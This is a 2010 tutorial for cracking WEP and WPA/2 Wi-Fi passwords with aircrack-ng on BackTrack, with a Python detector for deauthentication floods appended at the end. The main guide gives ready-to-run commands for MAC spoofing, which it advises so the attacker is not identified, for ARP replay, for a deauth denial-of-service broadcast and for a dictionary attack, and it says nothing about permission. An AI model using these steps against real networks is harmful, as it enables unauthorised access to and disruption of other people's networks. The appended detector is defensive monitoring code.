Hacking Encrypted Wireless Network
Written by Fredrik Alm, CompuTechSweden 2010
http://www.fredrik-alm.se/
REQUIREMENTS

Software:
Operating System: Linux kernel (Recommended: BackTrack 4 Final)
Download: Live CD (1570 MB)
3rd Party Software: aircrack-ng (Pre-Included in BackTrack), macchanger (Pre-Included in BackTrack)

Hardware:
Computer: A working standard Desktop/Laptop PC. (No Hard Drive Needed)
Devices: A Linux compatible Wi-Fi device installed on your PC.

Word Explanation
AP = Access Point (Wi-Fi Station) (ex. Router / Hack Target)
## = An optional number (ex: 30)
DEVICE = The computer's Wi-Fi device card (ex: wlan0)
BSSID = The AP's MAC address (ex: F4:32:B6:4C:DE:4A)
CHANNEL = The AP's active Wi-Fi channel (ex: 6)
WORDLIST = Path to a dictionary wordlist (ex: home/passwords.txt)
FAKEMAC = An optional faked MAC address (ex: 00:11:22:33:44:66)
CAPTUREFILE = The file where captured data is stored (ex: wepcapture-01.cap)

Useful keyboard shortcuts in Terminal
Ctrl + C = In Terminal: Quitting an active process (ex: data capturing)
Key = Toggle between the last used commands.
Preparing: Wi-Fi Device

Before attacking a wireless network, fake your MAC address on your Wi-Fi device to prevent users from logging your real ID. When experienced, use a complex faked MAC address so you don't reveal yourself.
(Ex. 00:11:22:33:44:66 = Obvious for others but easy for you to remember.)
(Ex. F4:32:B6:4C:DE:4A = Difficult to detect but hard for you to remember.)
not, then type sudo -s in every terminal before executing commands.)

# iwconfig
Lists your compatible Wi-Fi devices. Use this command to see the name of your device. Device name examples: wlan0, wifi0, eth0

# airmon-ng stop DEVICE
Disables monitor mode on your Wi-Fi device.

# macchanger --mac FAKEMAC DEVICE
Changes your MAC address to an optional fake MAC on your Wi-Fi device.

# airmon-ng start DEVICE
Enables monitor mode on your Wi-Fi device.
Hacking: WEP Encryption

Wired Equivalent Privacy (WEP) is an easily broken and therefore deprecated algorithm to secure wireless networks. This type of encryption can be directly brute-forced, without the need of a dictionary. When hacking, the attacker must capture a large amount of data, which later will be decrypted by brute force to reveal the network password. The more data is captured, the higher the chance of a successful decryption. To be on the safe side, capture 200 000+ packets and 500+ ARP:s.
not, then type sudo -s in every terminal before executing the first command.)

- Terminal 1
# airodump-ng DEVICE
Lists all AP:s nearby, revealing their MAC addresses, active channels, encryption (ex. WEP / WPA) etc.

- Terminal 2
# airodump-ng -c CHANNEL -w CAPTUREFILE --bssid BSSID DEVICE
Captures and saves encrypted data/packets from the network on your computer.

- Terminal 3
# aireplay-ng -3 -b BSSID -h FAKEMAC DEVICE
Captures ARP:s from the AP and speeds up the data capture.

- Terminal 1, 2 or 3
# ls
Displays all files and folders in the current directory (root). Look for the CAPTUREFILE (ex. wepcapture-01.cap).

# aircrack-ng --bssid BSSID CAPTUREFILE
Decrypts the captured data by brute force to finally reveal the network password.
Hacking: WPA/2 Encryption

Wi-Fi Protected Access (WPA) is a more secure and therefore hard-to-break algorithm to secure wireless networks. This type of encryption can't be directly brute-forced. After collecting the so-called WPA handshake, only a dictionary attack (a wordlist with passwords) containing the correct password can break the encryption to reveal the network password. Capturing a WPA handshake depends entirely on computers authorized on the network: it is when a computer connects to the network that the WPA handshake can be captured. This can be helped with the De-Auth process in the following commands. Before hacking, download a big and good wordlist from the internet to use with the decryption.
not, then type sudo -s in every terminal before executing the first command.)

- Terminal 1
# airodump-ng DEVICE
Lists all AP:s nearby, revealing their MAC addresses, active channels, encryption (ex. WEP / WPA) etc.

- Terminal 2
# airodump-ng -c CHANNEL -w CAPTUREFILE --bssid BSSID DEVICE
Captures and saves encrypted data/packets from the network on your computer.

- Terminal 3
# aireplay-ng -0 ## -a BSSID DEVICE
Sends out a De-Auth broadcast (DoS attack) to force all computers on the wireless network to perform a reconnect. If successful, this might help capture the WPA handshake.

- Terminal 1, 2 or 3
# ls
Displays all files and folders in the current directory (root). Look for the CAPTUREFILE (ex. wpacapture-01.cap).

# aircrack-ng -w WORDLIST CAPTUREFILE
Decrypts the captured data by dictionary attack to finally reveal the network password.
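The De-Auth broadcast step above is exactly what a wireless IDS looks for on the defending side: a burst of deauthentication frames addressed to ff:ff:ff:ff:ff:ff with the AP's MAC as source. The following detector is an added example, not part of the original guide; it parses the 24-byte 802.11 MAC header of raw frames and flags any BSSID that sees five or more broadcast deauths within one second. The sample frames, MAC addresses and threshold are constructed for the demonstration.

```python
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))

def mac_str(raw):
    return ":".join(f"{x:02x}" for x in raw)

def build_frame(fc0, da, sa, bssid, body=b""):
    # Minimal 802.11 frame: frame control, duration, addr1-3, sequence control, body.
    return (bytes([fc0, 0x00]) + b"\x00\x00" + mac_bytes(da) + mac_bytes(sa)
            + mac_bytes(bssid) + b"\x00\x00" + body)

def parse_header(frame):
    """Return (type, subtype, addr1, addr2, addr3) from the 24-byte MAC header."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]  # bits 2-3: type, bits 4-7: subtype
    return ((fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF,
            mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22]))

def is_broadcast_deauth(frame):
    hdr = parse_header(frame)
    # Management frames are type 0; deauthentication is subtype 12 (0xC).
    return hdr is not None and hdr[0] == 0 and hdr[1] == 12 and hdr[2] == BROADCAST

def detect_deauth_flood(frames, window=1.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_bytes).
    Returns {bssid: peak count} for every BSSID whose broadcast deauths
    within any `window` seconds reach `threshold`."""
    times = {}
    for ts, raw in frames:
        if is_broadcast_deauth(raw):
            times.setdefault(parse_header(raw)[4], []).append(ts)
    alerts = {}
    for bssid, stamps in times.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):  # sliding window over sorted timestamps
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts

# Constructed sample capture: a beacon, a data frame, one benign unicast deauth, then a burst.
AP, CLIENT, OTHER_AP = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:ff", "66:77:88:99:aa:bb"
SAMPLE = [
    (0.00, build_frame(0x80, BROADCAST, AP, AP)),                       # beacon (subtype 8)
    (0.10, build_frame(0x08, AP, CLIENT, AP)),                          # data frame (type 2)
    (0.20, build_frame(0xC0, CLIENT, OTHER_AP, OTHER_AP, b"\x03\x00")),  # single unicast deauth
] + [(0.30 + i * 0.05, build_frame(0xC0, BROADCAST, AP, AP, b"\x07\x00")) for i in range(8)]

if __name__ == "__main__":
    print(detect_deauth_flood(SAMPLE))  # {'00:11:22:33:44:55': 8}
```

The single unicast deauth to one client is normal AP behaviour and is not reported; only the eight-frame broadcast burst against the first AP crosses the threshold.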